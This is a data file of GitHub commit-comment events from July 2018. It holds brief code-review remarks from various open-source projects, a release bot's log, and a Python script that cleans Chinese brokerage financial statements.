{"id":"7927332340","type":"CommitCommentEvent","actor":{"login":"neko314"},"repo":{"name":"fjordllc/bootcamp"},"payload":{"comment":{"id":29617618,"position":13,"line":88,"path":"db/schema.rb","commit_id":"be5b4e9b0f387ebd13fd3cbf3537aec2271af9c0","created_at":"2018-07-06T07:36:57Z","updated_at":"2018-07-06T07:36:57Z","author_association":"NONE","body":"@komagata \r\n\r\nすみません、自分の作業なのですがなぜ削除したのかがわかりません。削除や変更をしたつもりはないので、なにか操作をミスしてしまったのかもしれないです。\r\n\r\nこの2行、もとに戻します。"}},"created_at":"2018-07-06T07:36:57Z"}
{"id":"7927334261","type":"CommitCommentEvent","actor":{"login":"bozeak"},"repo":{"name":"easySuite/ding_language"},"payload":{"comment":{"id":29617629,"position":35,"line":35,"path":"ding_language.module","commit_id":"7ac7f03bdbf621a3388e6829a6c6401022600693","created_at":"2018-07-06T07:37:26Z","updated_at":"2018-07-06T07:37:26Z","author_association":"CONTRIBUTOR","body":"https://github.com/easySuite/ding2/pull/465#discussion_r200566241"}},"created_at":"2018-07-06T07:37:26Z"}
{"id":"7927336234","type":"CommitCommentEvent","actor":{"login":"shenfangda520"},"repo":{"name":"zhen-ke/electron-qiniu"},"payload":{"comment":{"id":29617631,"position":12,"line":43,"path":"src/main/index.js","commit_id":"1ab2ba6098dc8ff8d5739144f1ebcc3d5d049d51","created_at":"2018-07-06T07:37:55Z","updated_at":"2018-07-06T07:37:55Z","author_association":"NONE","body":"dasd\r\n\r\n\r\n"}},"created_at":"2018-07-06T07:37:55Z"}
{"id":"7927336540","type":"CommitCommentEvent","actor":{"login":"mr-koww"},"repo":{"name":"Ad1n/Black_Jack"},"payload":{"comment":{"id":29617632,"position":14,"line":14,"path":"card_deck.rb","commit_id":"3f40ea5009232584d38c567c4c372ad824202bfa","created_at":"2018-07-06T07:38:00Z","updated_at":"2018-07-06T07:38:00Z","author_association":"NONE","body":"Правильней будет сделать не модулем, а отдельным классом. И лучше бы разделить на card и deck"}},"created_at":"2018-07-06T07:38:00Z"}
{"id":"7927341518","type":"CommitCommentEvent","actor":{"login":"ana"},"repo":{"name":"ana/lava-ci-staging"},"payload":{"comment":{"id":29617644,"position":8,"line":22,"path":"templates/usb/usb.jinja2","commit_id":"00ebc55093795a6cf1dfee7a2c518719b10cdd88","created_at":"2018-07-06T07:39:16Z","updated_at":"2018-07-06T07:39:16Z","author_association":"OWNER","body":":+1: \r\n"}},"created_at":"2018-07-06T07:39:16Z"}
{"id":"7927342556","type":"CommitCommentEvent","actor":{"login":"jarvist"},"repo":{"name":"jarvist/TheDancer.jl"},"payload":{"comment":{"id":29617646,"position":null,"line":null,"path":null,"commit_id":"6e755461ef78f9bf3854ded35f4a55cb3d0f9b35","created_at":"2018-07-06T07:39:30Z","updated_at":"2018-07-06T07:39:30Z","author_association":"OWNER","body":"Nice! \r\nWould probably make sense to move the comment blocks into the doc strings, so they can be used in the REPL + used to build online documentation. \r\nhttps://docs.julialang.org/en/stable/manual/documentation/\r\n\r\nProbably worth checking whether `global` inherits `const`. This makes an enormous speed difference, as top-level variables otherwise automatically inherit an `Any` type + speed of expressions using them slows to mere Python levels.\r\n\r\nIf I have time I'll hack this together in vim. "}},"created_at":"2018-07-06T07:39:30Z"}
{"id":"7927347112","type":"CommitCommentEvent","actor":{"login":"ana"},"repo":{"name":"ana/lava-ci-staging"},"payload":{"comment":{"id":29617651,"position":5,"line":19,"path":"templates/usb/usb.jinja2","commit_id":"00ebc55093795a6cf1dfee7a2c518719b10cdd88","created_at":"2018-07-06T07:40:38Z","updated_at":"2018-07-06T07:40:38Z","author_association":"OWNER","body":"The sleep test is already doing 10 times this so we could lower it to 3?5?"}},"created_at":"2018-07-06T07:40:38Z"}
{"id":"7927349294","type":"CommitCommentEvent","actor":{"login":"hispeedimagins"},"repo":{"name":"hispeedimagins/steem"},"payload":{"comment":{"id":29617656,"position":3,"line":71,"path":"app/src/main/java/com/steemapp/lokisveil/steemapp/Databases/FollowersDatabase.kt","commit_id":"b2678f009ce0ee0ba1587dff9dd9ce790bf5c369","created_at":"2018-07-06T07:41:11Z","updated_at":"2018-07-06T07:41:11Z","author_association":"OWNER","body":"For deleting with Id"}},"created_at":"2018-07-06T07:41:11Z"}
{"id":"7927351196","type":"CommitCommentEvent","actor":{"login":"LordCynic"},"repo":{"name":"LordCynic/Bot-Alpha"},"payload":{"comment":{"id":29617660,"position":null,"line":null,"path":null,"commit_id":"f9157d69d9c1a053802b9ae905d621a74cb99f03","created_at":"2018-07-06T07:41:39Z","updated_at":"2018-07-06T07:41:39Z","author_association":"OWNER","body":"- Not York. Regardless glad it happened as a learning experience."}},"created_at":"2018-07-06T07:41:39Z"}
{"id":"7927355564","type":"CommitCommentEvent","actor":{"login":"Davidlovegithub"},"repo":{"name":"claekchen/tianchi_finance_bigdata"},"payload":{"comment":{"id":29617670,"position":null,"line":null,"path":null,"commit_id":"46db47978a93d1caf511f28b6c313fb010ee67ad","created_at":"2018-07-06T07:42:45Z","updated_at":"2018-07-06T07:42:45Z","author_association":"NONE","body":"`import xlrd\r\nfrom sklearn import linear_model\r\nimport numpy as np\r\nimport pandas as pd\r\n\r\nworkbook = xlrd.open_workbook('Income Statement.xls')\r\nbooksheet = workbook.sheet_by_index(3)\r\ncompany = booksheet.col_values(1)\r\ncompany1 = []\r\nfor i in company[1:]:\r\n    if i not in company1:\r\n        company1.append(i)\r\nendtime = booksheet.col_values(4) \r\nendtime1 = []\r\nfor i in endtime:\r\n    if i not in endtime1:\r\n        endtime1.append(i)\r\n#print(endtime1)\r\nendtime2 = ['2018-03-31','2017-12-31','2017-09-30','2017-06-30','2017-03-31','2016-12-31','2016-09-30','2016-06-30','2016-03-31','2015-12-31','2015-09-30','2015-06-30','2015-03-31','2014-12-31','2014-09-30','2014-06-30','2014-03-31','2013-12-31','2013-09-30','2013-06-30','2013-03-31']\r\ndf_revenue = pd.DataFrame(np.arange(693).reshape((33,21)),index=company1, columns=endtime2)\r\nall_row = []\r\nfor r in range(len(company)):\r\n    all_row.append(booksheet.row_values(r))\r\nfor i in range(len(all_row)):\r\n    for j in endtime2:\r\n        for k in company1:\r\n            if all_row[i][1] == k and all_row[i][4] == j:\r\n                df_revenue[j][k] = all_row[i][9]\r\nfor a in endtime2:\r\n    for b in company1:\r\n        df_revenue[a][b]=float(df_revenue[a][b])\r\nfor a in endtime2:\r\n    for b in company1:\r\n        if df_revenue[a][b] < 1000:\r\n            df_revenue[a][b] = max(df_revenue.ix[b])\r\n\r\nlb1 = []\r\nlb2 = []\r\nlb3 = []\r\nfor i in company1:\r\n    lb1 = [i]\r\n    lb2 = lb1*21\r\n    for j in lb2:\r\n        lb3.append(j)\r\nendtime3 = endtime2*33\r\ncol_1 = ['股票代码','营业收入','单季营业收入','营业支出','管理费用','货币资金','客户资金存款','交易性金融资产','佣金现金流','经营现金流','投资收益现金流']\r\ndf_timeline = pd.DataFrame(np.arange(7623).reshape((693,11)),index=endtime3, columns=col_1)\r\ndf_timeline['股票代码'] = lb3\r\nlb4 = []\r\nlb6 = []\r\nfor a in company1:\r\n    lb6.append(df_revenue.ix[a])\r\n    for b in df_revenue.ix[a]:\r\n        lb4.append(b)\r\ndf_timeline['营业收入'] = lb4\r\n\r\nlb7 = lb6\r\nfor a in range(len(lb6)):\r\n    lb7[a][0]=lb6[a][0]\r\n    lb7[a][1]=lb6[a][1] - lb6[a][2]\r\n    lb7[a][2]=lb6[a][2] - lb6[a][3]\r\n    lb7[a][3]=lb6[a][3] - lb6[a][4]\r\n    lb7[a][4]=lb6[a][4]\r\n    lb7[a][5]=lb6[a][5] - lb6[a][6]\r\n    lb7[a][6]=lb6[a][6] - lb6[a][7]\r\n    lb7[a][7]=lb6[a][7] - lb6[a][8]\r\n    lb7[a][8]=lb6[a][8]\r\n    lb7[a][9]=lb6[a][9] - lb6[a][10]\r\n    lb7[a][10]=lb6[a][10] - lb6[a][11]\r\n    lb7[a][11]=lb6[a][11] - lb6[a][12]\r\n    lb7[a][12]=lb6[a][12]\r\n    lb7[a][13]=lb6[a][13] - lb6[a][14]\r\n    lb7[a][14]=lb6[a][14] - lb6[a][15]\r\n    lb7[a][15]=lb6[a][15] - lb6[a][16]\r\n    lb7[a][16]=lb6[a][16]\r\n    lb7[a][17]=lb6[a][17] - lb6[a][18]\r\n    lb7[a][18]=lb6[a][18] - lb6[a][19]\r\n    lb7[a][19]=lb6[a][19] - lb6[a][20]\r\n    lb7[a][20]=lb6[a][20]\r\nlb8 = []\r\nfor a in range(len(lb7)):\r\n    for b in lb7[a]:\r\n        lb8.append(b)\r\ndf_timeline['单季营业收入'] = lb8\r\n\r\ncogs = [0.0]*693\r\nguanlifei = [0.0]*693\r\nfor i in range(len(all_row)):\r\n    for j in range(len(endtime3)):\r\n        if all_row[i][1] == lb3[j] and all_row[i][4] == endtime3[j]:\r\n            cogs[j]=all_row[i][24]\r\n            guanlifei[j]=all_row[i][26]\r\nfor a in range(len(cogs)):\r\n    if cogs[a]== 0:\r\n        cogs[a] = cogs[a-4]\r\nfor b in range(len(guanlifei)):\r\n    if guanlifei[b]== 0:\r\n        guanlifei[b] = guanlifei[b-4]\r\n\r\ncogs1 = cogs\r\nfor n in range(173):\r\n    cogs1[4*n-3] = float(cogs[4*n-3])-float(cogs[4*n-2])\r\n    cogs1[4*n-2] = float(cogs[4*n-2])-float(cogs[4*n-1])\r\n    cogs1[4*n-1] = float(cogs[4*n-1])-float(cogs[4*n])\r\nguanlifei1 = guanlifei\r\nfor n in range(173):\r\n    guanlifei1[4*n-3] = float(guanlifei[4*n-3])-float(guanlifei[4*n-2])\r\n    guanlifei1[4*n-2] = float(guanlifei[4*n-2])-float(guanlifei[4*n-1])\r\n    guanlifei1[4*n-1] = float(guanlifei[4*n-1])-float(guanlifei[4*n])\r\n    \r\ndf_timeline['营业支出'] = cogs1\r\ndf_timeline['管理费用'] = guanlifei1\r\n\r\n########\r\n\r\nworkbook_2 = xlrd.open_workbook('Balance Sheet.xls')\r\nbooksheet_2 = workbook_2.sheet_by_index(3)\r\ncompany_2 = booksheet_2.col_values(1)\r\nall_row_2 = []\r\nfor r in range(len(company_2)):\r\n    all_row_2.append(booksheet_2.row_values(r))\r\n\r\ntrad_fa = [0.0]*693\r\ncash_e = [0.0]*693\r\nclient_d = [0.0]*693\r\nfor i in range(len(all_row_2)):\r\n    for j in range(len(endtime3)):\r\n        if all_row_2[i][1] == lb3[j] and all_row_2[i][4] == endtime3[j]:\r\n            trad_fa[j]=all_row_2[i][14]\r\n            cash_e[j]=all_row_2[i][9]\r\n            client_d[j]=all_row_2[i][10]\r\nfor a in range(len(trad_fa)):\r\n    if trad_fa[a]== 0 or trad_fa[a]=='':\r\n        trad_fa[a] = trad_fa[a-4]\r\nfor b in range(len(cash_e)):\r\n    if cash_e[b]== 0 or cash_e[b]== '':\r\n        cash_e[b] = cash_e[b-4]\r\nfor c in range(len(client_d)):\r\n    if client_d[c]== 0 or client_d[c]== '':\r\n        client_d[c] = client_d[c-4]\r\n\r\ntrad_fa1 = trad_fa\r\nfor n in range(173):\r\n    trad_fa1[4*n-3] = float(trad_fa[4*n-3])-float(trad_fa[4*n-2])\r\n    trad_fa1[4*n-2] = float(trad_fa[4*n-2])-float(trad_fa[4*n-1])\r\n    trad_fa1[4*n-1] = float(trad_fa[4*n-1])-float(trad_fa[4*n])\r\ncash_e1 = cash_e\r\nfor n in range(173):\r\n    cash_e1[4*n-3] = float(cash_e[4*n-3])-float(cash_e[4*n-2])\r\n    cash_e1[4*n-2] = float(cash_e[4*n-2])-float(cash_e[4*n-1])\r\n    cash_e1[4*n-1] = float(cash_e[4*n-1])-float(cash_e[4*n])\r\nclient_d1 = client_d\r\nfor n in range(173):\r\n    client_d1[4*n-3] = float(client_d[4*n-3])-float(client_d[4*n-2])\r\n    client_d1[4*n-2] = float(client_d[4*n-2])-float(client_d[4*n-1])\r\n    client_d1[4*n-1] = float(client_d[4*n-1])-float(client_d[4*n])\r\n    \r\ndf_timeline['货币资金'] = cash_e\r\ndf_timeline['客户资金存款'] = client_d\r\ndf_timeline['交易性金融资产'] = trad_fa\r\n\r\n#########\r\n\r\nworkbook_3 = xlrd.open_workbook('Cash Flow Statement.xls')\r\nbooksheet_3 = workbook_3.sheet_by_index(3)\r\ncompany_3 = booksheet_3.col_values(1)\r\nall_row_3 = []\r\nfor r in range(len(company_3)):\r\n    all_row_3.append(booksheet_3.row_values(r))\r\n\r\ninvest = [0.0]*693\r\nyongjin = [0.0]*693\r\ncfo = [0.0]*693\r\nfor i in range(len(all_row_3)):\r\n    for j in range(len(endtime3)):\r\n        if all_row_3[i][1] == lb3[j] and all_row_3[i][4] == endtime3[j]:\r\n            invest[j]=all_row_3[i][14]\r\n            yongjin[j]=all_row_3[i][12]\r\n            cfo[j]=all_row_3[i][19]\r\nfor a in range(len(invest)):\r\n    if invest[a]== 0 or invest[a]=='':\r\n        invest[a] = invest[a-4]\r\nfor b in range(len(yongjin)):\r\n    if yongjin[b]== 0 or yongjin[b]== '':\r\n        yongjin[b] = yongjin[b-4]\r\nfor c in range(len(cfo)):\r\n    if cfo[c]== 0 or cfo[c]== '':\r\n        cfo[c] = cfo[c-4]\r\n\r\ninvest1 = invest\r\nfor n in range(173):\r\n    invest1[4*n-3] = float(invest[4*n-3])-float(invest[4*n-2])\r\n    invest1[4*n-2] = float(invest[4*n-2])-float(invest[4*n-1])\r\n    invest1[4*n-1] = float(invest[4*n-1])-float(invest[4*n])\r\nyongjin1 = yongjin\r\nfor n in range(173):\r\n    yongjin1[4*n-3] = float(yongjin[4*n-3])-float(yongjin[4*n-2])\r\n    yongjin1[4*n-2] = float(yongjin[4*n-2])-float(yongjin[4*n-1])\r\n    yongjin1[4*n-1] = float(yongjin[4*n-1])-float(yongjin[4*n])\r\ncfo1 = cfo\r\nfor n in range(173):\r\n    cfo1[4*n-3] = float(cfo[4*n-3])-float(cfo[4*n-2])\r\n    cfo1[4*n-2] = float(cfo[4*n-2])-float(cfo[4*n-1])\r\n    cfo1[4*n-1] = float(cfo[4*n-1])-float(cfo[4*n])\r\n    \r\ndf_timeline['佣金现金流'] = yongjin\r\ndf_timeline['经营现金流'] = cfo\r\ndf_timeline['投资收益现金流'] = invest\r\n\r\ndf_timeline.to_csv(\"证券行业清洗数据.csv\",index=False,sep=',',encoding = 'utf-8')\r\ndf_timeline.to_excel(\"证券行业清洗数据.xlsx\",index=False)\r\n\r\nendtime5 = ['2018-03','2017-12','2017-09','2017-06','2017-03','2016-12','2016-09','2016-06','2016-03','2015-12','2015-09','2015-06','2015-03','2014-12','2014-09','2014-06','2014-03','2013-12','2013-09','2013-06','2013-03']\r\nendtime6=endtime5*33\r\ndf_rev = pd.DataFrame(np.arange(1386).reshape((693,2)),index=None, columns=['time','revenue'])\r\ndf_rev['time']=endtime6\r\ndf_rev['revenue']=lb8\r\nlist_b = []\r\nlist_c=[]\r\nfor x in range(33):\r\n    df_rev1 = df_rev[21*x-21:21*x].sort(columns = ['time'],axis = 0,ascending = True)\r\n    list_c=[df_rev1,company1[x]]\r\n    list_b.append(list_c)\r\n#list_b是最终总的二维列表，list_c是单个的`"}},"created_at":"2018-07-06T07:42:45Z"}
{"id":"7927360076","type":"CommitCommentEvent","actor":{"login":"leofeyer"},"repo":{"name":"contao/core-bundle"},"payload":{"comment":{"id":29617678,"position":7,"line":61,"path":"src/Resources/contao/classes/DropZone.php","commit_id":"a87b6466dca4ac4b7842e91dce6acf440fc7b411","created_at":"2018-07-06T07:43:53Z","updated_at":"2018-07-06T07:43:53Z","author_association":"MEMBER","body":"Changed in 0be72547672e16b182463e343016365dd2e55bc5 then. I also adjusted the other places."}},"created_at":"2018-07-06T07:43:53Z"}
{"id":"7927362848","type":"CommitCommentEvent","actor":{"login":"spl"},"repo":{"name":"leanprover/mathlib"},"payload":{"comment":{"id":29617687,"position":8,"line":33,"path":"docs/tactics.md","commit_id":"b4a85486504fbb4b5be707b761e847c694e5914a","created_at":"2018-07-06T07:44:33Z","updated_at":"2018-07-06T07:44:33Z","author_association":"CONTRIBUTOR","body":"Should this be `rintro` instead of `rintros`?"}},"created_at":"2018-07-06T07:44:33Z"}
{"id":"7927363203","type":"CommitCommentEvent","actor":{"login":"debbie1120"},"repo":{"name":"debbie1120/verificationCodes"},"payload":{"comment":{"id":29617688,"position":35,"line":30,"path":"README.md","commit_id":"cf2bd416d5efc50146264e1a84ea0d0ae5e344be","created_at":"2018-07-06T07:44:38Z","updated_at":"2018-07-06T07:44:38Z","author_association":"OWNER","body":"[verificationCodes/微信图片_20180706145727_看图王.png](url)"}},"created_at":"2018-07-06T07:44:38Z"}
{"id":"7927363342","type":"CommitCommentEvent","actor":{"login":"spl"},"repo":{"name":"leanprover/mathlib"},"payload":{"comment":{"id":29617689,"position":50,"line":83,"path":"tactic/interactive.lean","commit_id":"b4a85486504fbb4b5be707b761e847c694e5914a","created_at":"2018-07-06T07:44:40Z","updated_at":"2018-07-06T07:44:40Z","author_association":"CONTRIBUTOR","body":"Should this be `rintro` instead of `rintros`?"}},"created_at":"2018-07-06T07:44:40Z"}
{"id":"7927364441","type":"CommitCommentEvent","actor":{"login":"NamelessCoder"},"repo":{"name":"clickstorm/cs_seo"},"payload":{"comment":{"id":29617692,"position":null,"line":null,"path":null,"commit_id":"33357304351a42c9febf92b0f9ef6668ba279642","created_at":"2018-07-06T07:44:57Z","updated_at":"2018-07-06T07:44:57Z","author_association":"NONE","body":"- NamelessCoder\\GizzleGitPlugins\\GizzlePlugins\\ClonePlugin:000000002c3ba359000000007c023ef7:\n  - 0: Executing Git clone command: /usr/bin/git clone --depth 1 --single-branch --branch '2.3.4' 'https://github.com/clickstorm/cs_seo.git' /tmp/33357304351a42c9febf92b0f9ef6668ba279642/cs_seo\n  - NamelessCoder\\TYPO3RepositoryGizzle\\GizzlePlugins\\ExtensionRepositoryReleasePlugin:000000002c3ba347000000007c023ef7:\n    - resultCode: 10504\n    - resultMessages:\n      - 0: Please note that it might take a while (up to an hour) until your extension and the documentation appear on TYPO3.org.\n      - version: 2.3.4"}},"created_at":"2018-07-06T07:44:57Z"}
{"id":"7927366002","type":"CommitCommentEvent","actor":{"login":"debbie1120"},"repo":{"name":"debbie1120/verificationCodes"},"payload":{"comment":{"id":29617699,"position":35,"line":30,"path":"README.md","commit_id":"cf2bd416d5efc50146264e1a84ea0d0ae5e344be","created_at":"2018-07-06T07:45:18Z","updated_at":"2018-07-06T07:45:18Z","author_association":"OWNER","body":"[verificationCodes/微信图片_20180706145723_看图王.png](url)"}},"created_at":"2018-07-06T07:45:18Z"}
{"id":"7927367961","type":"CommitCommentEvent","actor":{"login":"bd82"},"repo":{"name":"jhipster/jhipster-core"},"payload":{"comment":{"id":29617706,"position":null,"line":null,"path":null,"commit_id":"9f9c4c19d19cee3c5f9ceca7780536da439eef4b","created_at":"2018-07-06T07:45:46Z","updated_at":"2018-07-06T07:45:46Z","author_association":"CONTRIBUTOR","body":"Thanks. Good to know."}},"created_at":"2018-07-06T07:45:46Z"}
{"id":"7927368984","type":"CommitCommentEvent","actor":{"login":"bozeak"},"repo":{"name":"easySuite/ding_language"},"payload":{"comment":{"id":29617709,"position":null,"line":null,"path":null,"commit_id":"7ac7f03bdbf621a3388e6829a6c6401022600693","created_at":"2018-07-06T07:46:00Z","updated_at":"2018-07-06T07:46:00Z","author_association":"CONTRIBUTOR","body":"Now strongarm variables mentioned are handled by gronbib_frontend module, this should keep them. Are you proposing to make them \"global\"?"}},"created_at":"2018-07-06T07:46:00Z"}
{"id":"7927370981","type":"CommitCommentEvent","actor":{"login":"PLASMAchicken"},"repo":{"name":"PLASMAchicken/soappy-guard-discordjs"},"payload":{"comment":{"id":29617711,"position":null,"line":null,"path":null,"commit_id":"da0ef8ffc1756eede2513ec0d410f84ad7b0a917","created_at":"2018-07-06T07:46:29Z","updated_at":"2018-07-06T07:46:29Z","author_association":"OWNER","body":"fixes #10 "}},"created_at":"2018-07-06T07:46:29Z"}
{"id":"7927371372","type":"CommitCommentEvent","actor":{"login":"debbie1120"},"repo":{"name":"debbie1120/verificationCodes"},"payload":{"comment":{"id":29617713,"position":34,"line":29,"path":"README.md","commit_id":"cf2bd416d5efc50146264e1a84ea0d0ae5e344be","created_at":"2018-07-06T07:46:35Z","updated_at":"2018-07-06T07:46:35Z","author_association":"OWNER","body":"![image](verificationCodes/微信图片_20180706145727_看图王.png)"}},"created_at":"2018-07-06T07:46:35Z"}
{"id":"7927373853","type":"CommitCommentEvent","actor":{"login":"LeonB"},"repo":{"name":"onivim/oni"},"payload":{"comment":{"id":29617718,"position":null,"line":null,"path":null,"commit_id":"7fc85b45b1cfcb2ab282f9290c5077c3d67640c1","created_at":"2018-07-06T07:47:09Z","updated_at":"2018-07-06T07:47:09Z","author_association":"NONE","body":"Keep up the good work!"}},"created_at":"2018-07-06T07:47:09Z"}
{"id":"7927374088","type":"CommitCommentEvent","actor":{"login":"coddec"},"repo":{"name":"passionate-coder/Classic-Start"},"payload":{"comment":{"id":29617719,"position":null,"line":null,"path":null,"commit_id":"cf8a1c2a8833d61c234cade6e4e2646ea52e9b6c","created_at":"2018-07-06T07:47:12Z","updated_at":"2018-07-06T07:47:12Z","author_association":"MEMBER","body":"👍 "}},"created_at":"2018-07-06T07:47:12Z"}
{"id":"7927380791","type":"CommitCommentEvent","actor":{"login":"liach"},"repo":{"name":"Railcraft/Railcraft"},"payload":{"comment":{"id":29617735,"position":44,"line":44,"path":"src/main/java/mods/railcraft/common/blocks/aesthetics/concrete/BlockReinforcedConcrete.java","commit_id":"6317fa81fbbd57442679a4b015ba0c37f116dd3b","created_at":"2018-07-06T07:48:44Z","updated_at":"2018-07-06T07:48:44Z","author_association":"MEMBER","body":"Should extend BlockRailcraftSubtyped"}},"created_at":"2018-07-06T07:48:44Z"}
{"id":"7927382960","type":"CommitCommentEvent","actor":{"login":"joye-ramone"},"repo":{"name":"joye-ramone/na-ogsr"},"payload":{"comment":{"id":29617742,"position":3,"line":50,"path":"gamedata/scripts/se_zones.script","commit_id":"f539efd75133355ab94cab32ecdba15131a8ac6f","created_at":"2018-07-06T07:49:15Z","updated_at":"2018-07-06T07:49:15Z","author_association":"OWNER","body":"Я не понимаю еще зачем он нужен)\r\nНо почему то с ним начало вылетать при начале новой игры.\r\nЯ видел что в ogse optimized тут вообще пусто, но там еще есть другие изменения.\r\nНужно разораться будет."}},"created_at":"2018-07-06T07:49:15Z"}
{"id":"7927387650","type":"CommitCommentEvent","actor":{"login":"liach"},"repo":{"name":"Railcraft/Railcraft"},"payload":{"comment":{"id":29617762,"position":104,"line":104,"path":"src/main/java/mods/railcraft/common/blocks/aesthetics/concrete/BlockReinforcedConcrete.java","commit_id":"6317fa81fbbd57442679a4b015ba0c37f116dd3b","created_at":"2018-07-06T07:50:15Z","updated_at":"2018-07-06T07:50:15Z","author_association":"MEMBER","body":"You do not need to check if the rollings machines are there, and for rebars they have default substitute items for crafting."}},"created_at":"2018-07-06T07:50:15Z"}
{"id":"7927387999","type":"CommitCommentEvent","actor":{"login":"ThomasHuai"},"repo":{"name":"ThomasHuai/puzzle"},"payload":{"comment":{"id":29617764,"position":null,"line":null,"path":null,"commit_id":"1d6cc4653ffbe6ec057ddef72b1582cc6cb4236d","created_at":"2018-07-06T07:50:18Z","updated_at":"2018-07-06T07:50:18Z","author_association":"OWNER","body":"感谢，问题为 python3.6 版本FAR常量赋值失败，原因可能是关键字冲突。已修复"}},"created_at":"2018-07-06T07:50:18Z"}
{"id":"7927391165","type":"CommitCommentEvent","actor":{"login":"blunden"},"repo":{"name":"LineageOS/lineage_wiki"},"payload":{"comment":{"id":29617770,"position":6,"line":14,"path":"_data/devices/lithium.yml","commit_id":"c900944519705fde7744ad88b274c8ff043860ca","created_at":"2018-07-06T07:51:01Z","updated_at":"2018-07-06T07:51:01Z","author_association":"CONTRIBUTOR","body":"@amtlib-dot-dll No, unfortunately not. I have a tree that should be similar but there was an issue with it last time I tried it. Feel free to give it a go though.\r\n\r\nhttps://forum.xda-developers.com/showpost.php?p=76672112&postcount=587\r\n\r\nhttps://github.com/blunden/android_device_xiaomi_lithium"}},"created_at":"2018-07-06T07:51:01Z"}
{"id":"7927391950","type":"CommitCommentEvent","actor":{"login":"ThomasHuai"},"repo":{"name":"ThomasHuai/puzzle"},"payload":{"comment":{"id":29617772,"position":null,"line":null,"path":null,"commit_id":"1d6cc4653ffbe6ec057ddef72b1582cc6cb4236d","created_at":"2018-07-06T07:51:12Z","updated_at":"2018-07-06T07:51:12Z","author_association":"OWNER","body":"解决办法是，FAR 改一个变量名，或者使用 Global"}},"created_at":"2018-07-06T07:51:12Z"}
{"id":"7927392238","type":"CommitCommentEvent","actor":{"login":"liach"},"repo":{"name":"Railcraft/Railcraft"},"payload":{"comment":{"id":29617773,"position":25,"line":25,"path":"src/main/java/mods/railcraft/common/blocks/aesthetics/concrete/ItemReinforcedConcrete.java","commit_id":"6317fa81fbbd57442679a4b015ba0c37f116dd3b","created_at":"2018-07-06T07:51:16Z","updated_at":"2018-07-06T07:51:16Z","author_association":"MEMBER","body":"Can you just fix this in `ItemBlockRailcraftSubtyped`?"}},"created_at":"2018-07-06T07:51:16Z"}
{"id":"7927394088","type":"CommitCommentEvent","actor":{"login":"liach"},"repo":{"name":"Railcraft/Railcraft"},"payload":{"comment":{"id":29617778,"position":14,"line":14,"path":"src/main/java/mods/railcraft/common/blocks/aesthetics/concrete/package-info.java","commit_id":"6317fa81fbbd57442679a4b015ba0c37f116dd3b","created_at":"2018-07-06T07:51:42Z","updated_at":"2018-07-06T07:51:42Z","author_association":"MEMBER","body":"err use control+alt+l to auto fix format in intellij"}},"created_at":"2018-07-06T07:51:42Z"}
{"id":"7927395276","type":"CommitCommentEvent","actor":{"login":"gvanem"},"repo":{"name":"torproject/tor"},"payload":{"comment":{"id":29617781,"position":null,"line":null,"path":null,"commit_id":"fecb8214d5e95ad605e8b0d431bc332e07f2ad3f","created_at":"2018-07-06T07:51:59Z","updated_at":"2018-07-06T07:51:59Z","author_association":"CONTRIBUTOR","body":"Are you it's only MSVC that doesn't have  `HAVE_STRCASECMP` and `HAVE_STRNCASECMP` set?\r\n\r\nBesides, with the new directory layout, Nmake seems unsupported. A good thing IMHO (since Nmake sucks so hard). So how is Tor supposed to be compiled with MSVC from now on?"}},"created_at":"2018-07-06T07:51:59Z"}
{"id":"7927395634","type":"CommitCommentEvent","actor":{"login":"creslinux"},"repo":{"name":"xmatthias/freqtrade"},"payload":{"comment":{"id":29617782,"position":null,"line":null,"path":null,"commit_id":"bf9db10305f24d373ebea22f3e3689cce2264a5e","created_at":"2018-07-06T07:52:05Z","updated_at":"2018-07-06T07:52:05Z","author_association":"NONE","body":"Write up of what this patch is doing and why should be a PR for production. \r\n\r\n<img width=\"511\" alt=\"screen shot 2018-07-06 at 7 50 01 am\" src=\"https://user-images.githubusercontent.com/34645187/42366720-763b65e6-80f1-11e8-8481-d3503dbe31ac.png\">\r\n\r\n"}},"created_at":"2018-07-06T07:52:05Z"}
{"id":"7927396531","type":"CommitCommentEvent","actor":{"login":"liach"},"repo":{"name":"Railcraft/Railcraft"},"payload":{"comment":{"id":29617787,"position":15,"line":241,"path":"src/main/java/mods/railcraft/common/blocks/aesthetics/generic/BlockGeneric.java","commit_id":"6317fa81fbbd57442679a4b015ba0c37f116dd3b","created_at":"2018-07-06T07:52:18Z","updated_at":"2018-07-06T07:52:18Z","author_association":"MEMBER","body":"Per my opinion, this is not a great idea to replace old concretes"}},"created_at":"2018-07-06T07:52:18Z"}
{"id":"7927400090","type":"CommitCommentEvent","actor":{"login":"ThomasHuai"},"repo":{"name":"ThomasHuai/puzzle"},"payload":{"comment":{"id":29617793,"position":null,"line":null,"path":null,"commit_id":"1d6cc4653ffbe6ec057ddef72b1582cc6cb4236d","created_at":"2018-07-06T07:53:09Z","updated_at":"2018-07-06T07:53:09Z","author_association":"OWNER","body":"FAR 1000 是比较小的误差了。可以再大。重复*图片集的数量要 > 拼图所需所有的块数。"}},"created_at":"2018-07-06T07:53:09Z"}
{"id":"7927400528","type":"CommitCommentEvent","actor":{"login":"liach"},"repo":{"name":"Railcraft/Railcraft"},"payload":{"comment":{"id":29617794,"position":4,"line":4,"path":"src/main/resources/assets/railcraft/blockstates/reinforced_concrete.json","commit_id":"6317fa81fbbd57442679a4b015ba0c37f116dd3b","created_at":"2018-07-06T07:53:16Z","updated_at":"2018-07-06T07:53:16Z","author_association":"MEMBER","body":"We should add a \"tinted_cube_all\" json for clarity in the future imo"}},"created_at":"2018-07-06T07:53:16Z"}
{"id":"7927401027","type":"CommitCommentEvent","actor":{"login":"0pdd"},"repo":{"name":"zerocracy/farm"},"payload":{"comment":{"id":29617795,"position":null,"line":null,"path":null,"commit_id":"11aaba3a2858c26464ac8cc03689d778cf6b5785","created_at":"2018-07-06T07:53:23Z","updated_at":"2018-07-06T07:53:23Z","author_association":"COLLABORATOR","body":"Puzzle `613-9bd5aca0` disappeared from [`pom.xml`](https://github.com/zerocracy/farm/blob/master/pom.xml), that's why I closed #1083. Please, remember that the puzzle was not necessarily removed in this particular commit. Maybe it happened earlier, but we discovered this fact only now."}},"created_at":"2018-07-06T07:53:23Z"}
